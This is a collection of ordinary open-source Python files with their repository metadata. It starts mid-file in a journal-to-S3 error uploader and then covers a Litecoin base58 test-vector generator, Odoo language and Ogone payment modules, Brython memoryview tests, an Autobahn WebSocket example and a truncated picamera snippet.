FIRST_FILE_LINENO = 2
FILE_LINENO = 3
STATEMENT = 4
EXCEPTION_CLASS = 5
EXCEPTION_END = 6
msg = None
state = EXCEPTION_START
class EventWriter(object):
def __init__(self, location):
_, self.bucket, prefix = urlparse(location)[:3]
self.prefix = prefix.strip('/')
self.s3_client = boto3.resource('s3')
def write(self, msg):
mod = hashlib.sha256()
mod.update(msg.encode("utf-8"))
key = "%s/%s.json" % (self.prefix, mod.hexdigest())
# print("XXX isolate msg:\n%s***" % str(msg))
LOGGER.info("upload event to s3://%s/%s" % (self.bucket, key))
self.s3_client.Object(self.bucket, key).put(Body=msg)
def append_content(content, writer=None):
global state, msg
if state == EXCEPTION_START:
look = exception_start_pat.match(content)
# print("XXX [EXCEPTION_START] look:%s" % str(look))
if look:
msg = {
'log_level': "ERROR",
'asctime': look.group('asctime'),
'remote_addr': look.group('remote_addr'),
'username': look.group('username'),
'http_path': look.group('http_path'),
'http_user_agent': look.group('http_user_agent'),
'frames': []
}
state = TRACEBACK_START
elif state == TRACEBACK_START:
look = traceback_start_pat.match(content)
if look:
state = FILE_LINENO
elif state == FILE_LINENO:
look = file_lineno_pat.match(content)
if look:
msg['frames'] += [{
'filename': look.group('filename'),
'lineno': look.group('lineno'),
'function': look.group('function')
}]
state = STATEMENT
else:
look = exception_class_pat.match(content)
if look:
msg.update({
'exception_type': look.group('exception_type')
})
msg = json.dumps(msg)
state = EXCEPTION_END
elif state == STATEMENT:
msg['frames'][-1].update({
'context_line': content.strip()
})
state = FILE_LINENO
if state == EXCEPTION_END:
if writer:
writer.write(msg)
msg = None
state = EXCEPTION_START
def parse_output(filename, writer):
with open(filename) as filed:
for line in filed.readlines():
append_content(line, writer)
def main(args):
parser = argparse.ArgumentParser(\
usage='%(prog)s [options] command\n\nVersion\n %(prog)s version ' \
+ str(__version__))
parser.add_argument('--version', action='version',
version='%(prog)s ' + str(__version__))
parser.add_argument('-c', '--unit', dest='unit', default=APP_NAME)
parser.add_argument('--location', dest='location',
default='s3://%s/50x/' % S3_LOGS_BUCKET)
parser.add_argument('filenames', nargs='*')
options = parser.parse_args(args[1:])
unit = options.unit
writer = EventWriter(options.location)
if options.filenames:
for filename in options.filenames:
parse_output(filename, writer)
return
global PAT
PAT = re.compile(r'^gunicorn.%(unit)s.app: \[\d+\] ERROR.+\[.+\] ({.+)' % {
'unit': unit})
jctl = journal.Reader()
jctl.add_match(_SYSTEMD_UNIT='%s.service' % unit)
jctl.seek_tail()
jctl.get_previous() # Important! - Discard old journal entries
pctl = select.poll()
pctl.register(jctl, jctl.get_events())
msg = None
while True:
resp = pctl.poll()
if resp and jctl.process() == journal.APPEND:
# If we don't call `jctl.process()`, flags are not reset properly
# and poll does not wait.
# See https://www.freedesktop.org/software/systemd/man/sd_journal_get_events.html
for evt in jctl:
content = evt.get('MESSAGE')
look = pat.match(content)
if look:
msg = look.group(1)
elif isinstance(msg, six.string_types):
msg += content
else:
msg = None
if msg:
try:
val = json.loads(msg)
if writer:
writer.write(msg)
except (TypeError, ValueError) as err:
pass
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main(sys.argv)
|
bsd-2-clause
|
litecoin2/litecoin2
|
contrib/testgen/gen_base58_test_vectors.py
|
1064
|
4344
|
#!/usr/bin/env python
'''
Generate valid and invalid base58 address and private key test vectors.
Usage:
gen_base58_test_vectors.py valid 50 > ../../src/test/data/base58_keys_valid.json
gen_base58_test_vectors.py invalid 50 > ../../src/test/data/base58_keys_invalid.json
'''
# 2012 Wladimir J. van der Laan
# Released under MIT License
import os
from itertools import islice
from base58 import b58encode, b58decode, b58encode_chk, b58decode_chk, b58chars
import random
from binascii import b2a_hex
# key types
PUBKEY_ADDRESS = 48
SCRIPT_ADDRESS = 5
PUBKEY_ADDRESS_TEST = 111
SCRIPT_ADDRESS_TEST = 196
PRIVKEY = 176
PRIVKEY_TEST = 239
metadata_keys = ['isPrivkey', 'isTestnet', 'addrType', 'isCompressed']
# templates for valid sequences
templates = [
# prefix, payload_size, suffix, metadata
# None = N/A
((PUBKEY_ADDRESS,), 20, (), (False, False, 'pubkey', None)),
((SCRIPT_ADDRESS,), 20, (), (False, False, 'script', None)),
((PUBKEY_ADDRESS_TEST,), 20, (), (False, True, 'pubkey', None)),
((SCRIPT_ADDRESS_TEST,), 20, (), (False, True, 'script', None)),
((PRIVKEY,), 32, (), (True, False, None, False)),
((PRIVKEY,), 32, (1,), (True, False, None, True)),
((PRIVKEY_TEST,), 32, (), (True, True, None, False)),
((PRIVKEY_TEST,), 32, (1,), (True, True, None, True))
]
def is_valid(v):
'''Check vector v for validity'''
result = b58decode_chk(v)
if result is None:
return False
valid = False
for template in templates:
prefix = str(bytearray(template[0]))
suffix = str(bytearray(template[2]))
if result.startswith(prefix) and result.endswith(suffix):
if (len(result) - len(prefix) - len(suffix)) == template[1]:
return True
return False
def gen_valid_vectors():
'''Generate valid test vectors'''
while True:
for template in templates:
prefix = str(bytearray(template[0]))
payload = os.urandom(template[1])
suffix = str(bytearray(template[2]))
rv = b58encode_chk(prefix + payload + suffix)
assert is_valid(rv)
metadata = dict([(x,y) for (x,y) in zip(metadata_keys,template[3]) if y is not None])
yield (rv, b2a_hex(payload), metadata)
def gen_invalid_vector(template, corrupt_prefix, randomize_payload_size, corrupt_suffix):
'''Generate possibly invalid vector'''
if corrupt_prefix:
prefix = os.urandom(1)
else:
prefix = str(bytearray(template[0]))
if randomize_payload_size:
payload = os.urandom(max(int(random.expovariate(0.5)), 50))
else:
payload = os.urandom(template[1])
if corrupt_suffix:
suffix = os.urandom(len(template[2]))
else:
suffix = str(bytearray(template[2]))
return b58encode_chk(prefix + payload + suffix)
def randbool(p = 0.5):
'''Return True with P(p)'''
return random.random() < p
def gen_invalid_vectors():
'''Generate invalid test vectors'''
# start with some manual edge-cases
yield "",
yield "x",
while True:
# kinds of invalid vectors:
# invalid prefix
# invalid payload length
# invalid (randomized) suffix (add random data)
# corrupt checksum
for template in templates:
val = gen_invalid_vector(template, randbool(0.2), randbool(0.2), randbool(0.2))
if random.randint(0,10)<1: # line corruption
if randbool(): # add random character to end
val += random.choice(b58chars)
else: # replace random character in the middle
n = random.randint(0, len(val))
val = val[0:n] + random.choice(b58chars) + val[n+1:]
if not is_valid(val):
yield val,
if __name__ == '__main__':
import sys, json
iters = {'valid':gen_valid_vectors, 'invalid':gen_invalid_vectors}
try:
uiter = iters[sys.argv[1]]
except IndexError:
uiter = gen_valid_vectors
try:
count = int(sys.argv[2])
except IndexError:
count = 0
data = list(islice(uiter(), count))
json.dump(data, sys.stdout, sort_keys=True, indent=4)
sys.stdout.write('\n')
|
mit
|
BT-astauder/odoo
|
openerp/addons/base/res/res_lang.py
|
4
|
11722
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import locale
from locale import localeconv
import logging
import re
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class lang(osv.osv):
_name = "res.lang"
_description = "Languages"
_disallowed_datetime_patterns = tools.DATETIME_FORMATS_MAP.keys()
_disallowed_datetime_patterns.remove('%y') # this one is in fact allowed, just not good practice
def install_lang(self, cr, uid, **args):
"""
This method is called from openerp/addons/base/base_data.xml to load
some language and set it as the default for every partners. The
language is set via tools.config by the RPC 'create' method on the
'db' object. This is a fragile solution and something else should be
found.
"""
lang = tools.config.get('lang')
if not lang:
return False
lang_ids = self.search(cr, uid, [('code','=', lang)])
if not lang_ids:
self.load_lang(cr, uid, lang)
ir_values_obj = self.pool.get('ir.values')
default_value = ir_values_obj.get(cr, uid, 'default', False, ['res.partner'])
if not default_value:
ir_values_obj.set(cr, uid, 'default', False, 'lang', ['res.partner'], lang)
return True
def load_lang(self, cr, uid, lang, lang_name=None):
# create the language with locale information
fail = True
iso_lang = tools.get_iso_codes(lang)
for ln in tools.get_locales(lang):
try:
locale.setlocale(locale.LC_ALL, str(ln))
fail = False
break
except locale.Error:
continue
if fail:
lc = locale.getdefaultlocale()[0]
msg = 'Unable to get information for locale %s. Information from the default locale (%s) have been used.'
_logger.warning(msg, lang, lc)
if not lang_name:
lang_name = tools.ALL_LANGUAGES.get(lang, lang)
def fix_xa0(s):
"""Fix badly-encoded non-breaking space Unicode character from locale.localeconv(),
coercing to utf-8, as some platform seem to output localeconv() in their system
encoding, e.g. Windows-1252"""
if s == '\xa0':
return '\xc2\xa0'
return s
def fix_datetime_format(format):
"""Python's strftime supports only the format directives
that are available on the platform's libc, so in order to
be 100% cross-platform we map to the directives required by
the C standard (1989 version), always available on platforms
with a C standard implementation."""
# For some locales, nl_langinfo returns a D_FMT/T_FMT that contains
# unsupported '%-' patterns, e.g. for cs_CZ
format = format.replace('%-', '%')
for pattern, replacement in tools.DATETIME_FORMATS_MAP.iteritems():
format = format.replace(pattern, replacement)
return str(format)
lang_info = {
'code': lang,
'iso_code': iso_lang,
'name': lang_name,
'translatable': 1,
'date_format' : fix_datetime_format(locale.nl_langinfo(locale.D_FMT)),
'time_format' : fix_datetime_format(locale.nl_langinfo(locale.T_FMT)),
'decimal_point' : fix_xa0(str(locale.localeconv()['decimal_point'])),
'thousands_sep' : fix_xa0(str(locale.localeconv()['thousands_sep'])),
}
lang_id = False
try:
lang_id = self.create(cr, uid, lang_info)
finally:
tools.resetlocale()
return lang_id
def _check_format(self, cr, uid, ids, context=None):
for lang in self.browse(cr, uid, ids, context=context):
for pattern in self._disallowed_datetime_patterns:
if (lang.time_format and pattern in lang.time_format)\
or (lang.date_format and pattern in lang.date_format):
return False
return True
def _get_default_date_format(self, cursor, user, context=None):
return '%m/%d/%Y'
def _get_default_time_format(self, cursor, user, context=None):
return '%H:%M:%S'
_columns = {
'name': fields.char('Name', required=True),
'code': fields.char('Locale Code', size=16, required=True, help='This field is used to set/get locales for user'),
'iso_code': fields.char('ISO code', size=16, required=False, help='This ISO code is the name of po files to use for translations'),
'translatable': fields.boolean('Translatable'),
'active': fields.boolean('Active'),
'direction': fields.selection([('ltr', 'Left-to-Right'), ('rtl', 'Right-to-Left')], 'Direction', required=True),
'date_format':fields.char('Date Format', required=True),
'time_format':fields.char('Time Format', required=True),
'grouping':fields.char('Separator Format', required=True,help="The Separator Format should be like [,n] where 0 < n :starting from Unit digit.-1 will end the separation. e.g. [3,2,-1] will represent 106500 to be 1,06,500;[1,2,-1] will represent it to be 106,50,0;[3] will represent it as 106,500. Provided ',' as the thousand separator in each case."),
'decimal_point':fields.char('Decimal Separator', required=True),
'thousands_sep':fields.char('Thousands Separator'),
}
_defaults = {
'active': 1,
'translatable': 0,
'direction': 'ltr',
'date_format':_get_default_date_format,
'time_format':_get_default_time_format,
'grouping': '[]',
'decimal_point': '.',
'thousands_sep': ',',
}
_sql_constraints = [
('name_uniq', 'unique (name)', 'The name of the language must be unique !'),
('code_uniq', 'unique (code)', 'The code of the language must be unique !'),
]
_constraints = [
(_check_format, 'Invalid date/time format directive specified. Please refer to the list of allowed directives, displayed when you edit a language.', ['time_format', 'date_format'])
]
@tools.ormcache(skiparg=3)
def _lang_data_get(self, cr, uid, lang, monetary=False):
if type(lang) in (str, unicode):
lang = self.search(cr, uid, [('code', '=', lang)]) or \
self.search(cr, uid, [('code', '=', 'en_US')])
lang = lang[0]
conv = localeconv()
lang_obj = self.browse(cr, uid, lang)
thousands_sep = lang_obj.thousands_sep or conv[monetary and 'mon_thousands_sep' or 'thousands_sep']
decimal_point = lang_obj.decimal_point
grouping = lang_obj.grouping
return grouping, thousands_sep, decimal_point
def write(self, cr, uid, ids, vals, context=None):
for lang_id in ids :
self._lang_data_get.clear_cache(self)
return super(lang, self).write(cr, uid, ids, vals, context)
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
languages = self.read(cr, uid, ids, ['code','active'], context=context)
for language in languages:
ctx_lang = context.get('lang')
if language['code']=='en_US':
raise osv.except_osv(_('User Error'), _("Base Language 'en_US' can not be deleted!"))
if ctx_lang and (language['code']==ctx_lang):
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is User's Preferred Language!"))
if language['active']:
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is Active!\nPlease de-activate the language first."))
trans_obj = self.pool.get('ir.translation')
trans_ids = trans_obj.search(cr, uid, [('lang','=',language['code'])], context=context)
trans_obj.unlink(cr, uid, trans_ids, context=context)
return super(lang, self).unlink(cr, uid, ids, context=context)
#
# IDS: can be a list of IDS or a list of XML_IDS
#
def format(self, cr, uid, ids, percent, value, grouping=False, monetary=False, context=None):
""" Format() will return the language-specific output for float values"""
if percent[0] != '%':
raise ValueError("format() must be given exactly one %char format specifier")
formatted = percent % value
# floats and decimal ints need special action!
if grouping:
lang_grouping, thousands_sep, decimal_point = \
self._lang_data_get(cr, uid, ids[0], monetary)
eval_lang_grouping = eval(lang_grouping)
if percent[-1] in 'eEfFgG':
parts = formatted.split('.')
parts[0], _ = intersperse(parts[0], eval_lang_grouping, thousands_sep)
formatted = decimal_point.join(parts)
elif percent[-1] in 'diu':
formatted = intersperse(formatted, eval_lang_grouping, thousands_sep)[0]
return formatted
# import re, operator
# _percent_re = re.compile(r'%(?:\((?P<key>.*?)\))?'
# r'(?P<modifiers>[-#0-9 +*.hlL]*?)[eEfFgGdiouxXcrs%]')
lang()
def split(l, counts):
"""
>>> split("hello world", [])
['hello world']
>>> split("hello world", [1])
['h', 'ello world']
>>> split("hello world", [2])
['he', 'llo world']
>>> split("hello world", [2,3])
['he', 'llo', ' world']
>>> split("hello world", [2,3,0])
['he', 'llo', ' wo', 'rld']
>>> split("hello world", [2,-1,3])
['he', 'llo world']
"""
res = []
saved_count = len(l) # count to use when encoutering a zero
for count in counts:
if not l:
break
if count == -1:
break
if count == 0:
while l:
res.append(l[:saved_count])
l = l[saved_count:]
break
res.append(l[:count])
l = l[count:]
saved_count = count
if l:
res.append(l)
return res
intersperse_pat = re.compile('([^0-9]*)([^ ]*)(.*)')
def intersperse(string, counts, separator=''):
"""
See the asserts below for examples.
"""
left, rest, right = intersperse_pat.match(string).groups()
def reverse(s): return s[::-1]
splits = split(reverse(rest), counts)
res = separator.join(map(reverse, reverse(splits)))
return left + res + right, len(splits) > 0 and len(splits) -1 or 0
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
Danisan/odoo-1
|
addons/payment_ogone/controllers/main.py
|
389
|
1179
|
# -*- coding: utf-8 -*-
import logging
import pprint
import werkzeug
from openerp import http, SUPERUSER_ID
from openerp.http import request
_logger = logging.getLogger(__name__)
class OgoneController(http.Controller):
_accept_url = '/payment/ogone/test/accept'
_decline_url = '/payment/ogone/test/decline'
_exception_url = '/payment/ogone/test/exception'
_cancel_url = '/payment/ogone/test/cancel'
@http.route([
'/payment/ogone/accept', '/payment/ogone/test/accept',
'/payment/ogone/decline', '/payment/ogone/test/decline',
'/payment/ogone/exception', '/payment/ogone/test/exception',
'/payment/ogone/cancel', '/payment/ogone/test/cancel',
], type='http', auth='none')
def ogone_form_feedback(self, **post):
""" Ogone contacts using GET, at least for accept """
_logger.info('Ogone: entering form_feedback with post data %s', pprint.pformat(post)) # debug
cr, uid, context = request.cr, SUPERUSER_ID, request.context
request.registry['payment.transaction'].form_feedback(cr, uid, post, 'ogone', context=context)
return werkzeug.utils.redirect(post.pop('return_url', '/'))
|
agpl-3.0
|
rubyinhell/brython
|
www/src/Lib/test/test_memoryview.py
|
30
|
15575
|
"""Unit tests for the memoryview
Some tests are in test_bytes. Many tests that require _testbuffer.ndarray
are in test_buffer.
"""
import unittest
import test.support
import sys
import gc
import weakref
import array
import io
class AbstractMemoryTests:
source_bytes = b"abcdef"
@property
def _source(self):
return self.source_bytes
@property
def _types(self):
return filter(None, [self.ro_type, self.rw_type])
def check_getitem_with_type(self, tp):
b = tp(self._source)
oldrefcount = sys.getrefcount(b)
m = self._view(b)
self.assertEqual(m[0], ord(b"a"))
self.assertIsInstance(m[0], int)
self.assertEqual(m[5], ord(b"f"))
self.assertEqual(m[-1], ord(b"f"))
self.assertEqual(m[-6], ord(b"a"))
# Bounds checking
self.assertRaises(IndexError, lambda: m[6])
self.assertRaises(IndexError, lambda: m[-7])
self.assertRaises(IndexError, lambda: m[sys.maxsize])
self.assertRaises(IndexError, lambda: m[-sys.maxsize])
# Type checking
self.assertRaises(TypeError, lambda: m[None])
self.assertRaises(TypeError, lambda: m[0.0])
self.assertRaises(TypeError, lambda: m["a"])
m = None
self.assertEqual(sys.getrefcount(b), oldrefcount)
def test_getitem(self):
for tp in self._types:
self.check_getitem_with_type(tp)
def test_iter(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
self.assertEqual(list(m), [m[i] for i in range(len(m))])
def test_setitem_readonly(self):
if not self.ro_type:
return
b = self.ro_type(self._source)
oldrefcount = sys.getrefcount(b)
m = self._view(b)
def setitem(value):
m[0] = value
self.assertRaises(TypeError, setitem, b"a")
self.assertRaises(TypeError, setitem, 65)
self.assertRaises(TypeError, setitem, memoryview(b"a"))
m = None
self.assertEqual(sys.getrefcount(b), oldrefcount)
def test_setitem_writable(self):
if not self.rw_type:
return
tp = self.rw_type
b = self.rw_type(self._source)
oldrefcount = sys.getrefcount(b)
m = self._view(b)
m[0] = ord(b'1')
self._check_contents(tp, b, b"1bcdef")
m[0:1] = tp(b"0")
self._check_contents(tp, b, b"0bcdef")
m[1:3] = tp(b"12")
self._check_contents(tp, b, b"012def")
m[1:1] = tp(b"")
self._check_contents(tp, b, b"012def")
m[:] = tp(b"abcdef")
self._check_contents(tp, b, b"abcdef")
# Overlapping copies of a view into itself
m[0:3] = m[2:5]
self._check_contents(tp, b, b"cdedef")
m[:] = tp(b"abcdef")
m[2:5] = m[0:3]
self._check_contents(tp, b, b"ababcf")
def setitem(key, value):
m[key] = tp(value)
# Bounds checking
self.assertRaises(IndexError, setitem, 6, b"a")
self.assertRaises(IndexError, setitem, -7, b"a")
self.assertRaises(IndexError, setitem, sys.maxsize, b"a")
self.assertRaises(IndexError, setitem, -sys.maxsize, b"a")
# Wrong index/slice types
self.assertRaises(TypeError, setitem, 0.0, b"a")
self.assertRaises(TypeError, setitem, (0,), b"a")
self.assertRaises(TypeError, setitem, (slice(0,1,1), 0), b"a")
self.assertRaises(TypeError, setitem, (0, slice(0,1,1)), b"a")
self.assertRaises(TypeError, setitem, (0,), b"a")
self.assertRaises(TypeError, setitem, "a", b"a")
# Not implemented: multidimensional slices
slices = (slice(0,1,1), slice(0,1,2))
self.assertRaises(NotImplementedError, setitem, slices, b"a")
# Trying to resize the memory object
exc = ValueError if m.format == 'c' else TypeError
self.assertRaises(exc, setitem, 0, b"")
self.assertRaises(exc, setitem, 0, b"ab")
self.assertRaises(ValueError, setitem, slice(1,1), b"a")
self.assertRaises(ValueError, setitem, slice(0,2), b"a")
m = None
self.assertEqual(sys.getrefcount(b), oldrefcount)
def test_delitem(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
with self.assertRaises(TypeError):
del m[1]
with self.assertRaises(TypeError):
del m[1:4]
def test_tobytes(self):
for tp in self._types:
m = self._view(tp(self._source))
b = m.tobytes()
# This calls self.getitem_type() on each separate byte of b"abcdef"
expected = b"".join(
self.getitem_type(bytes([c])) for c in b"abcdef")
self.assertEqual(b, expected)
self.assertIsInstance(b, bytes)
def test_tolist(self):
for tp in self._types:
m = self._view(tp(self._source))
l = m.tolist()
self.assertEqual(l, list(b"abcdef"))
def test_compare(self):
# memoryviews can compare for equality with other objects
# having the buffer interface.
for tp in self._types:
m = self._view(tp(self._source))
for tp_comp in self._types:
self.assertTrue(m == tp_comp(b"abcdef"))
self.assertFalse(m != tp_comp(b"abcdef"))
self.assertFalse(m == tp_comp(b"abcde"))
self.assertTrue(m != tp_comp(b"abcde"))
self.assertFalse(m == tp_comp(b"abcde1"))
self.assertTrue(m != tp_comp(b"abcde1"))
self.assertTrue(m == m)
self.assertTrue(m == m[:])
self.assertTrue(m[0:6] == m[:])
self.assertFalse(m[0:5] == m)
# Comparison with objects which don't support the buffer API
self.assertFalse(m == "abcdef")
self.assertTrue(m != "abcdef")
self.assertFalse("abcdef" == m)
self.assertTrue("abcdef" != m)
# Unordered comparisons
for c in (m, b"abcdef"):
self.assertRaises(TypeError, lambda: m < c)
self.assertRaises(TypeError, lambda: c <= m)
self.assertRaises(TypeError, lambda: m >= c)
self.assertRaises(TypeError, lambda: c > m)
def check_attributes_with_type(self, tp):
m = self._view(tp(self._source))
self.assertEqual(m.format, self.format)
self.assertEqual(m.itemsize, self.itemsize)
self.assertEqual(m.ndim, 1)
self.assertEqual(m.shape, (6,))
self.assertEqual(len(m), 6)
self.assertEqual(m.strides, (self.itemsize,))
self.assertEqual(m.suboffsets, ())
return m
def test_attributes_readonly(self):
if not self.ro_type:
return
m = self.check_attributes_with_type(self.ro_type)
self.assertEqual(m.readonly, True)
def test_attributes_writable(self):
if not self.rw_type:
return
m = self.check_attributes_with_type(self.rw_type)
self.assertEqual(m.readonly, False)
def test_getbuffer(self):
# Test PyObject_GetBuffer() on a memoryview object.
for tp in self._types:
b = tp(self._source)
oldrefcount = sys.getrefcount(b)
m = self._view(b)
oldviewrefcount = sys.getrefcount(m)
s = str(m, "utf-8")
self._check_contents(tp, b, s.encode("utf-8"))
self.assertEqual(sys.getrefcount(m), oldviewrefcount)
m = None
self.assertEqual(sys.getrefcount(b), oldrefcount)
def test_gc(self):
for tp in self._types:
if not isinstance(tp, type):
# If tp is a factory rather than a plain type, skip
continue
class MyView():
def __init__(self, base):
self.m = memoryview(base)
class MySource(tp):
pass
class MyObject:
pass
# Create a reference cycle through a memoryview object.
# This exercises mbuf_clear().
b = MySource(tp(b'abc'))
m = self._view(b)
o = MyObject()
b.m = m
b.o = o
wr = weakref.ref(o)
b = m = o = None
# The cycle must be broken
gc.collect()
self.assertTrue(wr() is None, wr())
# This exercises memory_clear().
m = MyView(tp(b'abc'))
o = MyObject()
m.x = m
m.o = o
wr = weakref.ref(o)
m = o = None
# The cycle must be broken
gc.collect()
self.assertTrue(wr() is None, wr())
def _check_released(self, m, tp):
check = self.assertRaisesRegex(ValueError, "released")
with check: bytes(m)
with check: m.tobytes()
with check: m.tolist()
with check: m[0]
with check: m[0] = b'x'
with check: len(m)
with check: m.format
with check: m.itemsize
with check: m.ndim
with check: m.readonly
with check: m.shape
with check: m.strides
with check:
with m:
pass
# str() and repr() still function
self.assertIn("released memory", str(m))
self.assertIn("released memory", repr(m))
self.assertEqual(m, m)
self.assertNotEqual(m, memoryview(tp(self._source)))
self.assertNotEqual(m, tp(self._source))
def test_contextmanager(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
with m as cm:
self.assertIs(cm, m)
self._check_released(m, tp)
m = self._view(b)
# Can release explicitly inside the context manager
with m:
m.release()
def test_release(self):
for tp in self._types:
b = tp(self._source)
m = self._view(b)
m.release()
self._check_released(m, tp)
# Can be called a second time (it's a no-op)
m.release()
self._check_released(m, tp)
def test_writable_readonly(self):
# Issue #10451: memoryview incorrectly exposes a readonly
# buffer as writable causing a segfault if using mmap
tp = self.ro_type
if tp is None:
return
b = tp(self._source)
m = self._view(b)
i = io.BytesIO(b'ZZZZ')
self.assertRaises(TypeError, i.readinto, m)
def test_getbuf_fail(self):
self.assertRaises(TypeError, self._view, {})
def test_hash(self):
# Memoryviews of readonly (hashable) types are hashable, and they
# hash as hash(obj.tobytes()).
tp = self.ro_type
if tp is None:
self.skipTest("no read-only type to test")
b = tp(self._source)
m = self._view(b)
self.assertEqual(hash(m), hash(b"abcdef"))
# Releasing the memoryview keeps the stored hash value (as with weakrefs)
m.release()
self.assertEqual(hash(m), hash(b"abcdef"))
# Hashing a memoryview for the first time after it is released
# results in an error (as with weakrefs).
m = self._view(b)
m.release()
self.assertRaises(ValueError, hash, m)
def test_hash_writable(self):
# Memoryviews of writable types are unhashable
tp = self.rw_type
if tp is None:
self.skipTest("no writable type to test")
b = tp(self._source)
m = self._view(b)
self.assertRaises(ValueError, hash, m)
def test_weakref(self):
# Check memoryviews are weakrefable
for tp in self._types:
b = tp(self._source)
m = self._view(b)
L = []
def callback(wr, b=b):
L.append(b)
wr = weakref.ref(m, callback)
self.assertIs(wr(), m)
del m
test.support.gc_collect()
self.assertIs(wr(), None)
self.assertIs(L[0], b)
# Variations on source objects for the buffer: bytes-like objects, then arrays
# with itemsize > 1.
# NOTE: support for multi-dimensional objects is unimplemented.
class BaseBytesMemoryTests(AbstractMemoryTests):
ro_type = bytes
rw_type = bytearray
getitem_type = bytes
itemsize = 1
format = 'B'
class BaseArrayMemoryTests(AbstractMemoryTests):
ro_type = None
rw_type = lambda self, b: array.array('i', list(b))
getitem_type = lambda self, b: array.array('i', list(b)).tobytes()
itemsize = array.array('i').itemsize
format = 'i'
def test_getbuffer(self):
# XXX Test should be adapted for non-byte buffers
pass
def test_tolist(self):
# XXX NotImplementedError: tolist() only supports byte views
pass
# Variations on indirection levels: memoryview, slice of memoryview,
# slice of slice of memoryview.
# This is important to test allocation subtleties.
class BaseMemoryviewTests:
def _view(self, obj):
return memoryview(obj)
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj, tp(contents))
class BaseMemorySliceTests:
source_bytes = b"XabcdefY"
def _view(self, obj):
m = memoryview(obj)
return m[1:7]
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj[1:7], tp(contents))
def test_refs(self):
for tp in self._types:
m = memoryview(tp(self._source))
oldrefcount = sys.getrefcount(m)
m[1:2]
self.assertEqual(sys.getrefcount(m), oldrefcount)
class BaseMemorySliceSliceTests:
source_bytes = b"XabcdefY"
def _view(self, obj):
m = memoryview(obj)
return m[:7][1:]
def _check_contents(self, tp, obj, contents):
self.assertEqual(obj[1:7], tp(contents))
# Concrete test classes
class BytesMemoryviewTest(unittest.TestCase,
BaseMemoryviewTests, BaseBytesMemoryTests):
def test_constructor(self):
for tp in self._types:
ob = tp(self._source)
self.assertTrue(memoryview(ob))
self.assertTrue(memoryview(object=ob))
self.assertRaises(TypeError, memoryview)
self.assertRaises(TypeError, memoryview, ob, ob)
self.assertRaises(TypeError, memoryview, argument=ob)
self.assertRaises(TypeError, memoryview, ob, argument=True)
class ArrayMemoryviewTest(unittest.TestCase,
BaseMemoryviewTests, BaseArrayMemoryTests):
def test_array_assign(self):
# Issue #4569: segfault when mutating a memoryview with itemsize != 1
a = array.array('i', range(10))
m = memoryview(a)
new_a = array.array('i', range(9, -1, -1))
m[:] = new_a
self.assertEqual(a, new_a)
class BytesMemorySliceTest(unittest.TestCase,
BaseMemorySliceTests, BaseBytesMemoryTests):
pass
class ArrayMemorySliceTest(unittest.TestCase,
BaseMemorySliceTests, BaseArrayMemoryTests):
pass
class BytesMemorySliceSliceTest(unittest.TestCase,
BaseMemorySliceSliceTests, BaseBytesMemoryTests):
pass
class ArrayMemorySliceSliceTest(unittest.TestCase,
BaseMemorySliceSliceTests, BaseArrayMemoryTests):
pass
def test_main():
test.support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
|
bsd-3-clause
|
pawelmhm/AutobahnPython
|
examples/twisted/websocket/streaming/frame_based_server.py
|
18
|
2612
|
###############################################################################
##
## Copyright (C) 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import hashlib
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketServerFactory, \
WebSocketServerProtocol, \
listenWS
class FrameBasedHashServerProtocol(WebSocketServerProtocol):
"""
Frame-based WebSockets server that computes a running SHA-256 for message
data received. It will respond after every frame received with the digest
computed up to that point. It can receive messages of unlimited number
of frames. Digest is reset upon new message.
"""
def onMessageBegin(self, isBinary):
WebSocketServerProtocol.onMessageBegin(self, isBinary)
self.sha256 = hashlib.sha256()
def onMessageFrame(self, payload):
l = 0
for data in payload:
l += len(data)
self.sha256.update(data)
digest = self.sha256.hexdigest()
print("Received frame with payload length {}, compute digest: {}".format(l, digest))
self.sendMessage(digest.encode('utf8'))
def onMessageEnd(self):
self.sha256 = None
if __name__ == '__main__':
factory = WebSocketServerFactory("ws://localhost:9000")
factory.protocol = FrameBasedHashServerProtocol
enableCompression = False
if enableCompression:
from autobahn.websocket.compress import PerMessageDeflateOffer, \
PerMessageDeflateOfferAccept
## Function to accept offers from the client ..
def accept(offers):
for offer in offers:
if isinstance(offer, PerMessageDeflateOffer):
return PerMessageDeflateOfferAccept(offer)
factory.setProtocolOptions(perMessageCompressionAccept = accept)
listenWS(factory)
reactor.run()
|
apache-2.0
|
andreMonkey/camera_processing
|
filming_test.py
|
1
|
1179
|
#!/usr/bin/python
from __future__ import absolute_import, division, print_function, unicode_literals
import picamera
import time
import pi3d
W, H = 800, 600
with picamera.PiCamera() as camera:
camera.resolution = (W, H)
camera.framerate = 24
camera.start_preview()
#NB layer argument below, fps as slow as needed for whatever's changing
